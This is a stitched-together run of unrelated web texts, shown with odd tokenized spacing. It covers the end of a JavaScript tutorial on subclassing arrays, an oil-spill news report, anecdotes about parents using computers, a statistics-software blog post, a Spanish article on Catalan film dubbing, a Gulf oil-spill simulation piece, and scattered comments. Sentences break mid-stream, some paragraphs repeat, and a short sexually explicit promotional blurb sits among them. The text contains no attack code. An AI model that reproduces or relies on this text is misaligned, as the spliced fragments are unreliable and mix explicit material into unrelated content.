We ’ve taken care of length / indices relation , we ’ve set up Array .
prototype inheritance , but there ’s no way to change object ’s [ [ Class ] ] value .
And so this solution can not claim to be complete .
Does [ [ Class ] ] matter ?
You might be wondering — what are the actual implications of these pseudo - array objects having [ [ Class ] ] of “ Object ” not an “ Array ” .
Do we even care ?
Well , for once , there ’s an issue with object detection .
Ironically , the solution I proposed to detect arrays relies on [ [ Class ] ] , and so would fall short with objects like these .
// assuming that `sub` is a pseudo - array Object.prototype.toString.call(sub ) === ' [ object Array ] ' ; // false
Another , probably more important , implication is that some of the methods in ECMAScript actually rely on [ [ Class ] ] value .
For example , a well - known Function .
prototype.apply accepts an array as its second argument ( as well as an arguments object ) .
Section 15.3.4.3 of ES3 says — “ if argArray is neither an array nor an arguments object ( see 10.1.8 ) , a TypeError exception is thrown ” .
What this means is that if we pass pseudo - array object as a second argument to apply it will throw TypeError .
apply does n’t know or care if an object inherits from Array .
prototype ; neither does it care about object implementing special length / indices behavior .
All it cares is that object is of proper type — type that we , unfortunately , can not emulate .
// assuming that `sub` is a pseudo - array someFunction . apply ( this , sub ) ; // TypeError
There ’s some vagueness in specification on this matter .
For example , in Date.prototype.setTime spec says
“ If the this value is not a Date object , throw a TypeError exception . ” , but in Date.prototype.getTime , it uses [ [ Class ] ] rather than just “ not a Date object ” —
“ If the this value is not an object whose [ [ Class ] ] property is “ Date ” , throw a TypeError exception ” .
It ’s probably safe to assume that these 2 phrases — “ Date object ” and “ object with [ [ Class ] ] of ‘ Date ’ ” — have identical meaning .
Ditto for “ Array object ” and “ object with [ [ Class ] ] of ‘ Array ’ ” , as well as others .
Function.prototype.apply is not the only method sensitive to [ [ Class ] ] of an object .
Array.prototype.concat , for example , follows different algorithm based on whether an object is an array or not ( in other words — whether it has [ [ Class ] ] of “ Array ” or not ) .
// array ( [ [ Class ] ] == " Array " ) var arr = [ 'x ' , 'y ' ] ; // object with numeric properties ( [ [ Class ] ] == " Object " ) var obj = { ' 0 ' : ' x ' , ' 1 ' : 'y ' } ; [ 1,2,3].concat( arr ) ; // [ 1 , 2 , 3 , 'x ' , 'y ' ] [ 1,2,3].concat( obj ) ; // [ 1 , 2 , 3 , { ' 0 ' : 'x ' , ' 1 ' : 'y ' } ]
As you can see , array values are “ flattened ” , whereas non-array ones are left as is .
It is certainly possible to give these pseudo - arrays custom implementation of concat ( and “ fix ” any other of Array. prototype .* methods ) , but the problem with Function .
prototy pe.apply can not be solved .
It ’s worth mentioning that another downside of accessor - based pseudo - array approach is performance .
I have n’t done any tests , but it ’s pretty clear that an implementation which has to enumerate over all numeric properties on every access of length property is not going to perform well .
This is why I can't recommend this solution for anything other than educational purposes .
Wrappers .
Direct property injection .
Realizing a somewhat futile nature of subclassing arrays in Javascript often makes alternative solutions look very attractive .
One of such solutions is using wrappers .
Wrapper approach avoids setting up inheritance or emulating length / indices relation .
Instead , a factory - like function can create a plain Array object , and then augment it directly with any custom methods .
Since returned object is an Array one , it maintains proper length / indices relation , as well as [ [ Class ] ] of “ Array ” .
It also inherits from Array .
prototype , naturally .
function makeSubArray ( ) { var arr = [ ] ; arr.push.apply ( arr , arguments ) ; arr.last = function ( ) { return this [ this .
length - 1 ] ; } ; return arr ; } var sub = makeSubArray ( 1 , 2 , 3 ) ; sub instanceof Array ; // true sub.length ; // 3 sub.last ( ) ; // 3
While direct extension of array object is a beautiful , simplistic solution , it ’s not without downsides .
The main disadvantage is that on each invocation of constructor , an array needs to be extended with N number of methods .
The time it takes to create an array is no longer a constant ( if methods were on SubArray .
prototype ) , but is directly proportional to the number of methods that need to be added .
Wrappers .
Prototype chain injection .
To overcome the problem of “ N methods ” , another variation of wrappers can be used — the one in which object ’s prototype chain is augmented , rather than object itself .
Let ’s see how this could be done :
function SubArray ( ) { } SubArray.prototype = new Array ; SubArray.prototype.last = function ( ) { return this [ this .
length - 1 ] ; } ; function makeSubArray ( ) { var arr = [ ] ; arr.push.apply ( arr , arguments ) ; arr.__proto__ = SubArray .
prototype ; return arr ; }
The idea is simple .
When makeSubArray function is executed , two things happen : 1 ) an array object is created and is populated with any passed arguments ; 2 ) object ’s prototype chain is augmented in such way so that next object is SubArray .
prototype , not original Array .
prototype .
The augmentation of prototype chain is done via non-standard __proto__ property .
But what happens in makeSubArray function is of course only half of the story .
To make sure that object has Array .
prototype in its prototype chain , we need to make SubArray .
prototype inherit from it .
This is exactly what ’s being done on a second line of this snippet ( SubArray . prototype = new Array ) .
Prototype chain of an object returned from makeSubArray now looks like this :
new SubArray ( ) | | [ [ Prototype ] ] | v SubArray.prototype | | [ [ Prototype ] ] | v Array .
prototype | | [ [ Prototype ] ] | v Object.
prototype | | [ [ Prototype ] ] | v null
And because returned object is actually an Array , not an Object one , we also get length / indices relation as well as proper [ [ Class ] ] value .
In fact , we can go even further and move initialization logic into SubArray constructor itself :
function SubArray ( ) { var arr = [ ] ; arr.push.apply ( arr , arguments ) ; arr.__proto__ = SubArray.prototype ; return arr ; } SubArray.prototype = new Array ; SubArray.prototype.last = function ( ) { return this [ this .
length - 1 ] ; } ; var sub = new SubArray ( 1 , 2 , 3 ) ; sub instanceof SubArray ; // true sub instanceof Array ; // true
Even though augmenting prototype chain is a more performant solution , there ’s a clear downside — it relies on non-standard __proto__ property .
ECMAScript , unfortunately , does not allow to set [ [ Prototype ] ] of an object — internal property referencing immediate ancestor in its prototype chain .
Not even in 5th edition .
Even though __proto__ is supported by a rather large number of implementations , it is far from being truly compatible .
Summary
So here it is ; all the fun intricacies of subclassing arrays in Javascript .
We ’ve seen that contrary to what might seem , actual inheritance is by far not the only aspect of subclassing arrays in Javascript ; that arrays are different from regular objects by having special length / indices relation ; how this length / indices relation is important and has nothing to do with prototype chain of an object ; how arrays have special [ [ Class ] ] value of “ Array ” which is also rather important , and is n’t inherited either ; how it ’s not possible to change [ [ Class ] ] value of an object — not even in ECMAScript 5 .
We looked at different ways to “ subclass ” an array , starting from borrowing Array constructors from other contexts , and ending with augmentation of prototype chain .
We examined benefits and downsides of each one of those solutions .
What we have n’t touched upon is the performance metrics of each of the implementations — perhaps a good topic for another discussion .
On this note , I leave you with a table summarizing pros/cons of the above mentioned techniques .
Proper [ [ Class ] ] length / indices
Uses native objects only Requires ES3 only Stack ( Andrea Giammarchi ) No No Yes Yes IFrame borrowing ( Dean Edwards ) Yes Yes No Yes Accessors No Yes Yes No Direct extension Yes Yes Yes Yes Prototype extension Yes Yes Yes No
[ 1 ]
Whether this endeavor is something worth pursuing is a topic for another discussion
P.S. Big thanks to John David Dalton for reviewing an article and giving useful suggestions .
Starting today , the President and the Vice President ’s daily public schedules are now available online .
You do n’t have to come to WhiteHouse.gov to find out what the President and Vice President are up to each day – you can subscribe to their schedules via RSS or even add their schedules to your own Outlook , iCal , Google calendar , or any other calendar service that ’s compatible with an iCal feed .
Just click here to download the iCal feed and add it to your calendar today .
Your calendar will be automatically updated as new events are added to the President and Vice President ’s schedule .
President Obama is committed to making his Administration the most open and transparent in history .
From signing the Open Government Memorandum on day one , to publishing the White House visitor logs and reducing the influence of lobbyists and special interests , the Obama Administration ushering in a new era of open and accountable government .
Publishing the President and Vice President ’s daily public schedules is just one more way we ’re opening up the White House .
AUGUSTA
— Kalamazoo County officials declared a state of emergency Tuesday afternoon as more than
released into a creek began making its way downstream in the Kalamazoo River .
“ I just came from Fort Custer and you can smell it now , ” Kalamazoo County Undersheriff Pali Matyas said .
“ ...
It ’s all rolling downhill and there are a lot of complications . ”
Matyas said police , local fire departments and local hazardous - materials companies are working to set up booms to trap the crude oil but workers are not able to use their trucks to remove oil from the water because high water levels have made the areas inaccessible to the vehicles .
“ We ’re racing against time here too because the weather is supposed to get pretty bad tomorrow , ” Matyas said .
County officials said they began an emergency response at about 6 p.m.
Monday after news spread that a 30 - inch oil pipeline in Marshall sprung a leak and released oil into the Talmadge Creek , which feeds into the Kalamazoo River .
Houston - based Enbridge Energy Partners said the pipeline has been shut down but that did not happen before more than 800,000 gallons flowed into the creek .
Kalamazoo County officials said Tuesday that local health officials are monitoring the oil spill and advised residents to avoid all contact with water from the Kalamazoo River “ until further notice , ” according to a news release issued just after 1:30 p.m. Tuesday .
“ All surface water activities , including swimming , wading , fishing and boating / canoeing / kayaking , should cease , ” officials said in the news release .
“ Additionally , due to the fumes associated with a crude oil spill , people are warned to avoid ( spending ) time in the immediate area around the river .
This order will remain in effect until further investigation indicates that risk has been minimized . ”
Said Matyas : “ We ’re throwing everything we have at it . ”
RELATED :
Chemical benzine could post health hazard for humans and wildlife alike in Kalamazoo River oil spill
REACTIONS :
My mom has been working with computers since the PC was invented .
She ’s now a retired Technical Translator ( mostly engineering ) .
She went through all the windows versions .
She ’s been using computers for over 25 years .
Used both Macs and PC’s , had a graphic designer as an assistant for 10 years .
She ’s still completely clueless .
Ca n’t install a program .
Does n’t understand what compatibility means .
She ’s completely incapable of comprehending what a network or a router is .
And everytime you fix her PC , she immediately screws it up .
I finally gave up and gave her a very restricted user account .
It ’s the only way she wo n’t mess things up .
Every so often she calls me and somehow , she did something that ’s not even possible .
It ’s not even fucking POSSIBLE .
But she manages to do it .
“ Everytime I hit the space bar , Word closes ! ” WTF ?
permalink | 2:26 am , 17th October 2010
permalink | 3:10 pm , 7th July 2010
My mom writes “ E - mail ” on her calendar because it takes her so long .
a few more things off the top of my head from both my parents : ( i’m at college and my parents are home ) A while ago a “ black thing ” fell out of her laptop , and it would n’t turn on .
it was the power cord , i eventually figured out
“ the printer started making noises and kept making paper ” ( ha , it kept printing blank sheets ) .
“ Can I change the color of the light like my screen ? ” in reference to the laser mouse
Grandma : “ i’ve figured this thing [ remote ] out !
All these buttons other than these 5 are rubbish ”
“ How do I do youtubes ? , my friends tell me there ’s videos there .
Maybe I could find exercise friends to help me on youtubes ? ”
“ that copy paste thing trick you showed me has really taken off at the office ” ( face - palm )
more later after I talk with my mom today , haha .
I should buy her a webcam more stuff i remembered : me : “ hey mom , what ’s up with the smiley email you have now , why did you get it ? ” her : “ Oh , an ad said it was free , and it comes with 500 smilies ” me : “ do n’t download stuff without asking me fist please ” * proceeds to run antivirus and uninstall a bunch of things "
i was woken up by my mom at 5 am because the printer was making noises again and would n’t stop printing a pdf my mom sent to the printer the night before .
she said she pulled the plug on everything
found the usb plug for the mouse in the Ethernet port a few times .
WHY DID THEY MAKE THEM THE SAME WIDTH ??
“ dad , you have google search in the upper right , there .
You do n’t have to go to www.google.com” him : “ yeah , i’m not used to that ”
mom “ why ca n’t I shrink images like you did but I email them , then let them blow them back up on the other side to save space ? ”
That made for a nice 10 min car conversation on how image files work .
“ I do n’t want it to do that .
Make it do this instead ” ( should n’t have told my mom Ubuntu can be made anyway you want it to )
“ OHHHHH that ’s what the underscore does next to the x and the squares ” 10 something years on the computer not knowing what the minimize button does .
my mom kept closing windows to switch between them .
A little credit to my mom : I installed Ubuntu on my dad ’s old laptop for her to use .
It uses a Linksys wifi card , and I got it to work by entering a few commands in the terminal every time you turn on the computer .
With a 20 step guide to going root and entering codes , my mom could get wifi ( which she did , until I fixed it and it worked automagically ) .
My dad ’s been on computers since when he got a laptop with …..1 GIGABYTE of hard drive space ( big at the time ) .
He still double clicks links , does n’t use a scroll wheel , and uses no keyboard shortcuts ( other than ctrl-c and v after I told him ) .
courtesy permalink | 3:09 pm , 7th July 2010
My dad works in IT , so unfortunately , no funny stories there .
My in - laws , on the other hand , are a gold mine .
My mother - in - law was trying to order something from Macy ’s , and first got frustrated that there were n’t enough boxes to put in all the information because she did n’t know you had to scroll , and then got mad because for some reason she thought the X all the way up in the corner was the button you ’d click to send the order .
My father - in - law fell for an AOL phishing scheme about a decade ago , and the worst part is that it was just an Angel Fire page .
Well , really the worst part is after the page failed the first time , he went back and filled everything out again .
More recently I told him that Rocko ’s Modern Life was on Amazon , and he ordered the discs and what showed up were 4 DVD - Rs in white sleeves .
I knew the Amazon ones came in actual packaging , so we asked where he got them , and he ’d searched for “ Rocko ’s Modern Life ” on Amazon , then scrolled all the way down to the Sponsored Links , where he bought some bootlegs because he thought that Sponsored Links were the same as private sellers on Amazon .
courtesy permalink | 7:28 am , 7th July 2010
I had a job at an incoming call center for Officemax several years ago and in the training class , HR came in to show us how to fill out the timecards .
We filled them out in a web interface ; to run it , we opened a shortcut they placed on all our desktops .
It opened in Internet Explorer , so it behaves just like any other website ( hint : it was a website ) , but HR did n’t understand that .
HR : Okay , before we begin , I want to clarify this program is different from most programs you ’re familiar with .
There is no double - clicking .
Me : …
HR : This program was written by Germans and in Germany they do n’t double - click .
Do NOT double - click , or the program will crash .
Me : ( Dumbfounded )
Everybody else : ( Terrified ) courtesy permalink | 5:01 pm , 6th July 2010
This is how my mother gets to her hotmail : Open IE browser .
Default page is some random thing her ISP has set up with a google search bar in the middle .
She performs a google search for : “ Yahoo ” .
She doubleclicks on the first search result for the yahoo homepage .
When she reaches Yahoo , she performs a search in the Yahoo search box for “ hotmail ” .
She doubleclicks on the first link to get to the hotmail homepage .
Voila !
She can sign in and begin using her mail .
As someone whose primary job is designing products for the web , I pretty much spent the rest of the day face palming and slamming my head repeatedly against hard surfaces .
courtesy permalink | 4:40 pm , 6th July 2010
Fashion magazines and designers may beg to differ , but the androgynous look is '' out ' ' .
At least that 's what the 40,000 or so people who took part in an online project trying to find the ' ' perfect ' ' body believe .
Sydney researchers are trying to discover what is appealing about different body shapes by asking people to go to an especially designed website to rate bodies .
After at least 1000 have rated them , the attractive bodies get to electronically '' breed ' ' - elements of their figure are incorporated into new bodies - and the unattractive shapes are weeded out .
Out ... some catwalk looks were not popular .
Rob Brooks , the co-creator of the project and the director of the evolution and ecology research centre at the University of NSW , said the research showed a kind of evolution in fast - forward .
'' It 's a great illustration of how natural selection works , '' Professor Brooks said .
'' By simply just taking the best half of the population and breeding from them , generation to generation you can actually make big changes . ''
We take this approach because we want all of our clients to know that with us , you ’ll never be just another faceless case file .
We value the relationships we have with our clients and we want them to feel comfortable knowing that we ’re looking out for them .
With over 30 years of experience on our side , we ’ve helped countless clients get through the worst of times — so that they can begin to move forward in a positive direction .
At the end of the day , we want all of our clients to know that their needs will always be our first priority .
Whatever legal challenges you ’re facing , we ’ll walk you through the process step by step and address any questions or concerns you have along the way .
Are we supposed to say " OMG you mean youtube sends info to google ! ? "
This is completely ridiculous .
Yes , believe it or not many websites use google analytics and / or good ads because they are great services that are free and effective .
Its not like in the demo he went to many obscure sites either , the whole thing was plug for their website which was the third or fourth one they showed .
I thought it was going to show something much more pervasive than loading a dozen websites .
If they showed that on the checkout page of some sextoy website it was sending info to google maybe I 'd get the point .
Someone wasted their time writing the script , making the video , writing this article , I wasted my time watching it , I wasted my time writing this , you wasted your time reading my post . :)
In theory , if you have the free time , you can calculate any statistic you might need using nothing more than a pencil and paper .
After all , it ’s just matrix mathematics .
With a lot of data or a complicated procedure , though , you might need a lot of free time .
A generation ago , that ’s how most statistics were calculated .
Most people did n’t have computers , or calculators for that matter .
Slide rules … maybe .
Now , there is an abundance of hardware and software to ease the tedium .
Having a statistician ’s version of Norm Abram ’s workshop to use actually makes analyzing data a lot of fun .
Whether you ’re planning a career in statistics or just looking to analyze your current dataset , you ’re going to need software to do the calculations .
Yes , there are some people who still calculate descriptive statistics manually , but this practice is so prone to errors that it ’s only applied to very small datasets .
And yes , there are some people who develop their own statistical routines , usually with R , a programming language for statistics available for free under a General Public License , or matrix manipulation software like matlab , maple and mathematica .
Unless you ’re a mathematical statistician developing a new statistical technique , though , you wo n’t need to take this approach if you do n’t want to .
There ’s plenty of software available .
All you need to know is the kind of statistical analyses you ’re likely to use and your price range .
Software for General Statistics
With a few exceptions , almost all of the statistical software you ’ll find is geared to the most common types of statistical analysis , including descriptive statistics , hypothesis testing , correlation and regression , and analysis of variance .
Software used for statistical analysis can be grouped into five categories :
Web - based Calculators — Web sites that perform simple statistical calculations can be found at statpages.org / .
This is the low end of cost , but also usability .
You usually have to enter your data and edit it manually , so it ’s not really suitable for production work .
— Web sites that perform simple statistical calculations can be found at statpages.org / .
This is the low end of cost , but also usability .
You usually have to enter your data and edit it manually , so it ’s not really suitable for production work .
Spreadsheets — You probably already have a copy of Microsoft Excel or some other spreadsheet software on your computer .
If you are a beginner at data analysis , you ’ll find that you can accomplish most of what you want to do using spreadsheet software .
Advanced data analysis may be more of an issue , though .
Some statisticians advise against using spreadsheet software , particularly Excel , citing three reasons .
First , Excel does n’t do some calculations and graphs that statistical packages do .
Well , of course it does n’t .
It ’s a spreadsheet program that sells for less than $ 200 ( by itself , not part of Office ) compared to statistical packages that cost ten times as much .
Big deal .
Second , Excel ’s calculated probabilities are incorrect , reportedly in the third decimal place .
OK , but if you would base a decision solely on whether a probability is 0.051 instead of 0.049 , you really do n’t understand the nature of statistical testing ( more on this in another blog ) .
And third , Excel ’s random number generators are not of research quality .
Yup , so if you ’re planning to do Monte Carlo simulations with Excel … well , do n’t ( not necessarily because your answer will be wrong as much as because some people will think it is wrong ) .
— You probably already have a copy of Microsoft Excel or some other spreadsheet software on your computer .
If you are a beginner at data analysis , you ’ll find that you can accomplish most of what you want to do using spreadsheet software .
Advanced data analysis may be more of an issue , though .
Some statisticians advise against using spreadsheet software , particularly Excel , citing three reasons .
Basic Statistical Software — This category includes s oftware that is used mainly for less sophisticated types of statistical analysis .
Most can be purchased for less than about $ 500 .
Key examples include StatsDirect , In Stat , Analyze It , and Assistat .
— This category includes oftware that is used mainly for less sophisticated types of statistical analysis .
Most can be purchased for less than about $ 500 .
Key examples include StatsDirect , In Stat , Analyze It , and Assistat .
Intermediate Statistical Software — This category includes s oftware that can be used for many types of statistical analysis except some of the more sophisticated techniques like multivariate analysis .
Most but not all are a single module and cost less than about $ 1,000 .
Examples include NCSS , Statistix , Costat , Origin , Prostat , Soritec , MVSP , and Simstat .
— This category includes oftware that can be used for many types of statistical analysis except some of the more sophisticated techniques like multivariate analysis .
Most but not all are a single module and cost less than about $ 1,000 .
Examples include NCSS , Statistix , Costat , Origin , Prostat , Soritec , MVSP , and Simstat .
Major Statistical Packages — This category includes software that can be used for a variety of purposes .
Most have a base module and a variety of optional add - on modules .
They are usually purchased through annual licenses specifying a number of users , and cost more than about $ 1,000 ( in some cases , way over ) .
Some of the major packages like SAS and SPSS have been around since the mainframe days of the 1960s .
Others like Statistica are products of the 1980s development of personal computers .
Other examples include S - Plus , Stata , Systat , Minitab , and Statgraphics .
Data analysis programs typically have spreadsheet screens for data because statistical calculations use matrices , and after all , a spreadsheet is really just a matrix .
They also have utilities for both data management and graphing , which are essential for any type of data analysis .
Most all statistical software has graphical user interfaces ( GUIs ) and many also allow you to write your own code for specialized applications .
Almost all have downloadable demos , usually fully functional ( at least for basic statistics ) for 30 days .
To conduct an analysis with statistical software , you enter or upload your data , scrub it ( a whole other discussion ) , then pick from the program ’s menus the graphing or analysis procedure you want to run .
Submenus will pop up with all the specifications and options for the procedure .
So , it ’s quite easy to do a lot of statistical analyses with just a few mouse clicks but you really have to understand what all those specifications and options are about .
All of the software packages have their fans , especially the major packages .
SPSS was created in the 1960s by graduates of Stanford who continued development at the University of Chicago .
It used to be called Statistical Package for the Social Sciences , which is why it ’s still very popular in the social sciences .
SPSS was bought by IBM in 2009 .
SAS , formerly called the Statistical Analysis System , was developed in the early 1970s by professors at North Carolina State University .
S - Plus started out as a programming language developed by Bell Laboratories in the 1980s .
Minitab was created by professors at the Pennsylvania University in the 1970s from statistical spreadsheet software developed at the National Institute of Standards and Technology ( NIST ) .
It ’s now focusing on Six Sigma statistics procedures for managing quality .
There is no real best statistical software .
They ’re all pretty good , dollar - for - dollar .
A lot of what determines a user ’s preference is what software is ( was ) available at their college or the place they work .
For example , if you go ( went ) to Penn State , you probably think Minitab is the best .
If you work at a pharmaceutical company , you probably use SAS because that ’s what the entire pharmaceutical industry uses .
Social scientists like to use SPSS .
If you like programming your own procedures you ’re probably a proponent of the R programming language for statistics .
Assuming you do n’t have access to software through your school or work , you can evaluate your software needs by answering three questions :
How sophisticated are the statistical techniques you need to use ?
How often would you likely need to use the software ?
How much do you have to spend for the software ?
If you are planning on doing only one analysis , see if you can use what you have .
You may be able to do all your calculations in a spreadsheet program or use free software or web - based software .
If you are going to do full - time statistical consulting and you ca n’t afford a license for a major package , bite the bullet and learn R. Another option would be to buy a basic or an intermediate package and move up as you can afford to .
If you ’re only going to be an occasional user , any of the statistical packages will be better than using a spreadsheet ( except perhaps for dataset scrubbing ) , so purchase whatever you can afford .
If you are n’t acquainted with statistical software , conduct a web search or start at en.wikipedia.org/wiki/List_of_statistical_packages .
Explore the web sites you find to be sure that the software has the statistical procedures you think you will be using .
Almost all of the sites have free downloads , such as brochures , white papers and demonstration software .
Do n’t download the demo software until you ’re ready to make a decision .
Most demos are good for only 30 days after which the software wo n’t work even if you download a new copy .
Software for Specialized Applications
There are a few kinds of analysis you might run into that will require specialized software .
For example , have you ever seen an icon plot using sparklines or Chernoff faces ?
How about a ternary diagram or a piper plot ?
Some day you may have to produce one of these specialized graphics .
Software you could look into would include : Sigmaplot , Origin , AquaChem , GraphPad , EasyPlot , Delta Graph , and Grapher .
If you ever have to do time - series analysis , you could start with some of the high - end statistical packages .
Or , you could look into specialized software including Autobox , Eviews , ForecastX , and RATS .
If you have to produce maps , find a GIS expert to help you .
If you ’re committed to doing it yourself , try Surfer .
If you ’re not into meteorology or geology , you probably do n’t run into orientation data very often , but if you ever do , get Oriana .
For critical - path scheduling , try Microsoft Project or P5 , an update to Primavera Project Planner , now a product of Oracle .
There ’s also software for resampling statistics , control charts , ANOVA , neural networks , nonparametric statistics , power analysis , Bayesian statistics , data mining and many other specialties .
The software market changes rapidly .
The big packages keep getting bigger , spawning optional modules from procedures that used to be part of the basic package .
At the same time , new statistical software appears , usually for specialized application .
Spreadsheet software is also becoming more sophisticated .
Introductory statistics classes are now taught with spreadsheet software ; even calculators are a thing of the past .
So do some research and get the software that ’s best for your situation .
Read more about using statistics at the Stats with Cats blog .
Join other fans at the Stats with Cats Facebook group and the Stats with Cats Facebook page .
Order Stats with Cats : The Domesticated Guide to Statistics , Models , Graphs , and Other Breeds of Data Analysis at Wheatmark , amazon.com , barnesandnoble.com , or other online booksellers .
Harry Potter y las reliquias de la muerte ( parte 1 ) , que se estrenará el 19 de noviembre de 2010 , será una de las últimas películas en tener versión doblada catalana .
A partir del próximo año , los grandes taquillazos de Hollywood se estrenarán directamente en inglés en Cataluña .
Sin doblaje ni subtitulado .
Es la manera que tienen las grandes distribuidoras de EE UU de " acatar " la nueva Ley del Cine aprobada el martes , que les obliga a ofrecer versión catalana en la mitad de las copias de los filmes que se estrenen doblados o subtitulados en Cataluña .
Luis Hernández de Carlos , presidente de Fedicine , entidad que agrupa a las majors , evitó en todo momento hablar de " boicot " pero aseguró que las compañías estadounidenses cumplirán la ley : " Pero en términos generales van a reducir el número de películas que se estrenarán de manera considerable y las que lo hagan será en versión original .
Y punto " .
El departamento de Cultura de la Generalitat llama a la calma
Los exhibidores dicen que esta reglamentación cerrará salas
Más información
La mitad del cine en Cataluña hablará catalán
A su lado , Camilo Tarrazón , presidente del gremio de exhibidores de Cataluña , auguró cierre de salas y grandes pérdidas para el sector .
" En 2009 se estrenaron 370 títulos , pero unos 50 de ellos acapararon el 65 % de los espectadores " , señaló .
" Dejar de estrenar 10 de estos títulos ya nos puede suponer pérdidas del 15 % del mercado " .
Tarrazón , que insistió en que la nueva ley es " intervencionista " y que se ha hecho pensando solo en criterios lingüísticos en lugar de empresariales o culturales , afirmó que no estaba prevista otra huelga de cines como la que se realizó el pasado 1 de febrero : " Ahora , cuando un cine cierre sus puertas será para siempre y a causa de esta nueva ley " .
Desde el departamento de Cultura de la Generalitat , impulsores de la nueva regulación , se hizo una llamada a la calma .
" Ha pasado el momento de las amenazas " , señaló un portavoz .
" La ley se ha aprobado y entrará en vigor .
De lo que se trata ahora es de que el sector se siente a negociar para ver cómo el Gobierno puede ayudarle a adaptarse a esta nueva realidad .
Queremos ayudarles y ver entre todos cómo podemos dar un mejor servicio a los ciudadanos " .
Es una negociación que se plantea difícil .
La nueva ley entrará en vigor en enero y se calcula que hacia marzo podría estar elaborado el nuevo reglamento .
Será ahí donde podrían concretarse las ayudas tanto al doblaje como a la digitalización de las salas , aunque ni distribuidores ni exhibidores están muy dispuestos a sentarse a discutir la aplicación de una norma que rechazan de plano .
Con las elecciones catalanas a la vuelta de la esquina - se convocarán en otoño- , aseguran que ya no hay margen para negociar y menos , asegura Tarrazón , " con el equipo actual del departamento de Cultura " .
Confían en que el nuevo Gobierno no aplique la ley , algo que desde Cultura ven imposible : " El Parlament la ha aprobado con 117 votos a favor y 17 en contra .
Gane quien gane , la secundará " .
Para Luis Hernández de Carlos habrá que seguir negociando , pero el objetivo , insistió , es que al menos se elimine el término " obligación " de la misma .
" Es una cuestión de principios , no de dinero .
No estamos en contra del catalán , podríamos aceptar sin problemas que haya más películas dobladas en este idioma , pero no se puede aceptar la imposición y las sanciones para no sentar precedentes .
Si en España solo hubiera dos lenguas oficiales me atrevería a decirles que habría una salida ; sin embargo , hay cuatro y todos están mirando qué pasa en Cataluña " .
El presidente de FEDICINE admitió que ahora aceptaría sin dudar la primera oferta que le hizo el departamento ( asumir el coste íntegro del doblaje de las películas con más de 50 copias ) y cuyo rechazo puso en marcha la maquinaria legislativa .
" Todos hemos cometido errores " , aseguró .
" Durante estos últimos meses les dijimos que ahora sí aceptábamos aquel acuerdo , pero ya era tarde : se había entrado en un proceso electoral y no quisieron parar " .
Para Tarrazón , la ley vulnera normas europeas y de la OMC sobre el libre mercado y están pendientes requerimientos de Bruselas al respecto que no se han atendido .
" En cualquier caso , no queremos ser un mercado protegido , queremos ser empresas y poder programar en función de criterios comerciales " , afirmó .
En su opinión , la ley incentivará la piratería ya que aseguró que la gente abandonará las salas en busca de las versiones dobladas .
Detailed simulations of the Gulf of Mexico oil leak show that crude is likely to start spreading into the Atlantic Ocean soon .
Once oil becomes caught in the Gulf of Mexico 's fast moving Loop Current , it could be carried thousands of miles , around Florida , up the Atlantic coast of the US , and then out into the open ocean .
An animation by the US National Center for Atmospheric Research ( NCAR ) suggests that concentrations of oil in the water south of Florida will start to become detectable around 70 to 90 days after a leak starts .
The Deepwater Horizon rig sank on the 22nd April .
The animation , given to the BBC World Service 's Science in Action programme , is based on a computer model of ocean currents and eddies , and assumes that conditions will be similar to those found in a typical year .
At some time in the next six months it 's highly highly likely that it will escape from the Gulf Synte Peacock , NCAR
" In the Atlantic Ocean there is a Western Boundary Current System , and the Gulf of Mexico 's Loop Current is part of this system , " explains NCAR scientist Synte Peacock .
" So what happens is the current comes up through the Yucatan [ Channel , the strait between Mexico and Cuba ] , and it does a clockwise loop within the gulf , and then shoots out and joins the Gulf Stream proper .
" So when something in the gulf gets caught up within that current , it can get out of there . "
So with that definitely happen ?
Dr Peacock says : " At some time in the next six months it 's highly highly likely that it will escape from the Gulf . "
The Atlantic Ocean Gulf Stream carries water towards Europe , but the simulations show it is unlikely that oil will be detected that far away .
" Even a year after the spill start date , in our simulations we do n't see any detectable quantities of oil hitting Europe , " says Dr Peacock .
" It 's very diluted within the Atlantic Ocean . "
' Food colouring '
To create the dramatic video , the scientists modelled what would happen if they were to release a coloured tracer dye into the water at the site of the leak .
Image caption
The situation in the gulf is worse than that on which the simulation is based
" It 's like a food colouring .
You inject it into the ocean and watch it disperse , " explains Dr Peacock .
The virtual dye then shows the path that the water - and therefore the oil - could take .
The researchers repeated the experiment several times , using slightly different scenarios , to arrive at a likely spread pattern for the oil .
There are still some aspects to the Gulf of Mexico leak , and the behaviour of oil released at great depth , which are not fully understood .
The scientists say that could have an influence on the accuracy of the model .
" Oil is a little bit different , for several reasons ; it undergoes a number of transformations , " says Synte Peacock .
" There is a lot of evaporation in the first few hours , so it changes form .
" People are also skimming it like crazy , and trying to contain it as it comes up from the flow head .
So it 's not a perfect analogy by any means , but it 's the closest thing we have right now . "
The model assumes an oil leak lasting just 60 days , so already the reality is worse than the model scenario .
The eventual outcome will be complicated , as the southern US heads further into hurricane season .
The scientists are now trying to add simulations of storms ' possible effects to the model .
Kristy Klenot enjoys riding tall in the saddle .
She 's a nice , sweet girl with a peppery , energetic personality and a great sense of humor .
Here in the fresh air , in her own private forest reserve , Kristy removes her equestrian riding costume , every stitch including her kinky boots , and lets her fingers do the galloping as she heads for happy town .
Kristy does n't need a horse anyway .
She 's past that phase of girl - hood .
Besides , horses do n't come with air conditioning and smartphone connectivity .
Related Tags
" This is why we want the public to know what is really going on in their area and will publish monthly crime information about what is happening on their streets by January next year .
PREVIOUS POST
How To Become An Awesome Coder - Part 1 Updated :
Thanks to interwebslurker
wtf_sexism
[ dropofmoon 117 ] I was watching some videos on college humor and reading the comments at the same time .
The commentators are usually horribly sexist college guys .
That 's why it was such a thrill when I came across these two comments .
" College Humor continues to sell their sexist narrative of female inferiority to a creepily eager audience .
College Humor .
College .
Youth .
The youth of America , supposedly the most progressive demographic of the country , are still only comfortable with traditional gender roles .
And our civil rights woes are supposed to ease as the older , more bigoted generations mercifully die off .
Right .
Read the above comments and tell me you still have faith in the future of America .
The editors of College Humor , all avowed liberals , are enabling the perpetuation of the societial injustices they so loudly proclaim to be against by featuing damaging ( and plainly unfunny ) material like this video on their front page .
This is the best you can do ?
Driving home an unfair stereotype ?
You 're all horrible .
You 're all horrible because you say you 're something you 're not , and you rob people like me a chance at a decent future .
Fuck off , all of you .
Fuck your families and the horrible environments that allowed your wretched attitudes to infect society unchecked . "
He / she then got a ton of negative replies from the rest of the guys ( except from me ) and replied with this .
" What , exactly , do I have to be grateful for ?
That I 'm born into a country that tells me how to dress , what I should be interested in , who I should be marrying ?
A system so refined at brainwashing its citizens that any type of difference , though labeled as a free choice , is popularly disdained ?
What type of freedom is that ?
